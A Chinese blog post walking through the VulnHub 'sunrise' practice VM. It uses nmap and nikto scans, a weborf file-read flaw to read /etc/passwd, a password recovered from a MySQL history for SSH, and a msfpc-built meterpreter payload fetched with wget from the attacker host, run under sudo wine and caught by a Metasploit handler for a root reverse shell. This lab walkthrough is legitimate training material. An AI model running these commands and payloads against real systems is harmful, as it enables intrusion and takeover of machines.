<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="sunrise-vlunhub渗透测试"><meta name="keywords" content="靶机渗透"><meta name="author" content="我是小吴啦"><meta name="copyright" content="我是小吴啦"><title>sunrise-vlunhub渗透测试 | Chen's Blog</title><link rel="shortcut icon" href="/4.ico"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#渗透过程"><span class="toc-number">2.</span> <span class="toc-text">渗透过程</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#总结"><span class="toc-number">3.</span> <span class="toc-text">总结</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">我是小吴啦</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">99</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">13</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" href="https://jagger2zr.com" target="_blank" rel="noopener">Jagger</a><a class="author-info-links__name text-center" href="https://mochazz.github.io" target="_blank" rel="noopener">mochazz学长</a><a class="author-info-links__name text-center" href="https://www.cnblogs.com/bflw/" target="_blank" rel="noopener">强哥</a><a class="author-info-links__name text-center" href="http://p0desta.com/" target="_blank" rel="noopener">p0desta</a><a class="author-info-links__name text-center" href="https://github.com/Bypass007" target="_blank" rel="noopener">Bypass师傅</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://timgsa.baidu.com/timg?image&amp;quality=80&amp;size=b9999_10000&amp;sec=1587989465494&amp;di=25bf7ddc1982d8dbb238d7a90a78781e&amp;imgtype=0&amp;src=http%3A%2F%2Fimgs.aixifan.com%2Fo_1c8epo34e1nji18d3hn917iv1rha65.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Chen's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">sunrise-vlunhub渗透测试</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-01-12</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>靶机：vulnhub-sunrise</p>
<p>靶机IP:192.168.1.118</p>
<p>攻击机IP:192.168.1.117</p>
<a id="more"></a>

<p>考点：</p>
<p>​    nikto扫描web服务</p>
<p>​    msf反弹windwos-shell</p>
<h1 id="渗透过程"><a href="#渗透过程" class="headerlink" title="渗透过程"></a>渗透过程</h1><p>nmap扫描一下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sS -A -Pn <span class="number">192.168</span><span class="number">.1</span><span class="number">.118</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.png" alt="image-20200119224550964"></p>
<p>22号端口 ssh连接用的(简单的弱口令 爆破 低版本的绕过或者在后面会有提示的账户密码)<br>80端口 万恶之源 (敏感目录等一系列的漏洞)<br>3306端口 mysql数据库 (可以存在sql注入 敏感目录下的wen.config 需要账户和口令)<br>8080端口 这里是weborf服务 版本0.12.2 等下查一下有没有已知的漏洞</p>
<p>使用dirb扫描了一下，毛都没有</p>
<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/2.png" alt="image-20200119225208860"></p>
<p>再来看看8080端口，百度了一下weborf 0.12.2版本的漏洞</p>
<p><a href="http://www.guanting.com/security/exploit/information/17760.html" target="_blank" rel="noopener">http://www.guanting.com/security/exploit/information/17760.html</a></p>
<p>同样也可以使用工具发现他有文件读取漏洞。</p>
<p>nikto扫描一下web服务</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nikto -url http:<span class="comment">//192.168.1.118:8080/</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/3.png" alt="image-20200119230326076"></p>
<p>使用<code>searchsploit</code>查看该服务的历史漏洞</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit weborf</span><br></pre></td></tr></table></figure>

<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/4.png" alt="image-20200119230702006"></p>
<p>存在漏洞，我们可以读取到<code>/etc/passwd</code></p>
<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/5.png" alt="image-20200119231458604"></p>
<p>读到这几个文件，我们试着一个一个去尝试</p>
<p>读sunrise的内容</p>
<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/6.png" alt="image-20200119234619566"></p>
<p>发现<code>user.txt</code></p>
<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/7.png" alt="image-20200119234655492"></p>
<p>weborf的目录中没啥东西，扫描一下</p>
<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/8.png" alt="image-20200119235622002"></p>
<p>然后看看数据库的操作历史</p>
<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/9.png" alt="image-20200119235723958"></p>
<p><strong>尝试连接数据库无果，尝试ssh连接</strong>（因为有ssh的端口方法，所以就要试试有没有撞库的操作）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh weborf@<span class="number">192.168</span><span class="number">.1</span><span class="number">.118</span></span><br><span class="line">password: iheartrainbows44</span><br></pre></td></tr></table></figure>

<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/10.png" alt="image-20200120000734981"></p>
<p>然后尝试再连接数据库，可行。</p>
<p>然后查询数据库<code>mysql</code></p>
<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/11.png" alt="image-20200120001159065"></p>
<p>改用sunrise</p>
<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/12.png" alt="image-20200120004158058"></p>
<p>然后切换至root权限，它这个很奇怪，密码没有变，还是sunrise的密码。</p>
<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/13.png" alt="image-20200120004420273"></p>
<p>这里告诉我们可以使用的命令有wine。</p>
<p>使用wine运行shell吧，我们制造一个木马。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfpc windows <span class="number">192.168</span><span class="number">.1</span><span class="number">.117</span></span><br></pre></td></tr></table></figure>

<p>制作一个用于反弹shell的木马</p>
<p>然后开启监听</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m SimpleHTTPServer <span class="number">8000</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/14.png" alt="image-20200120014523495"></p>
<p>靶机中下载木马</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget http:<span class="comment">//192.168.1.117:8000/windows-meterpreter-staged-reverse-tcp-443.exe</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/15.png" alt="image-20200120014631645"></p>
<p>开启msf</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> <span class="title">exploit</span>/<span class="title">multi</span>/<span class="title">handler</span></span><br><span class="line"><span class="title">set</span> <span class="title">lhost</span> 192.168.1.117</span><br><span class="line"><span class="title">set</span> <span class="title">lport</span> 443</span><br><span class="line"><span class="title">exploit</span> -<span class="title">j</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/16.png" alt="image-20200120014934451"></p>
<p>靶机运行exe文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo wine windows-meterpreter-staged-reverse-tcp<span class="number">-443.</span>exe</span><br></pre></td></tr></table></figure>

<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/17.png" alt="image-20200120015300298"></p>
<p>反弹shell成功</p>
<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/18.png" alt="image-20200120015435829"></p>
<p>获得root.txt</p>
<p><img src="/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/19.png" alt="image-20200120015540380"></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>参考：<a href="https://www.freebuf.com/sectool/69362.html" target="_blank" rel="noopener">玩转Metasploit系列(第七集)</a></p>
<p>然后在这里有些细节还需要学习一下，关于这个后门模块的学习，wine的理解，连接session的理解，msf的使用，还有对渗透的整体思路有待提高。明天继续做渗透，还有代码审计。</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">我是小吴啦</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://yoursite.com/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">http://yoursite.com/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/">靶机渗透</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/01/12/emlog%E5%90%8E%E5%8F%B0getshell/"><i class="fa fa-chevron-left">  </i><span>emlog后台getshell</span></a></div><div class="next-post pull-right"><a href="/2020/01/10/pentests-Vulhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><span>pentests-Vulhub渗透测试</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://timgsa.baidu.com/timg?image&amp;quality=80&amp;size=b9999_10000&amp;sec=1587989465494&amp;di=25bf7ddc1982d8dbb238d7a90a78781e&amp;imgtype=0&amp;src=http%3A%2F%2Fimgs.aixifan.com%2Fo_1c8epo34e1nji18d3hn917iv1rha65.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2021 By 我是小吴啦</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>